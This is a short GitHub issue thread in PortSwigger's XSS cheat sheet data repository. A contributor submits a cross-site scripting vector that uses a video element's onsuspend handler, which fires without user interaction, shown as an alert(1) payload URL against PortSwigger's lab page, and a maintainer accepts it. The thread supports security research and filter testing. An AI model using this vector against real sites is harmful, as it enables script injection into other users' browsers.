### ISSUE TITLE
Add onsuspend  event - no user interaction

### ISSUE THREAD

**Issue by hansmach1ne** [PortSwigger/xss-cheatsheet-data#54]
Works in most browsers.

`https://portswigger-labs.net/xss/xss.php?x=%3Cvideo%20controls%20src=%22https://media.geeksforgeeks.org/wp-content/uploads/20190723123920/secondneon.mp4%22%20onsuspend=%22alert(1)%22%3E%3C/video%3E`

**Comment by hackvertor** [comment]
Thanks for the submission! This will be included on the cheat sheet shortly.
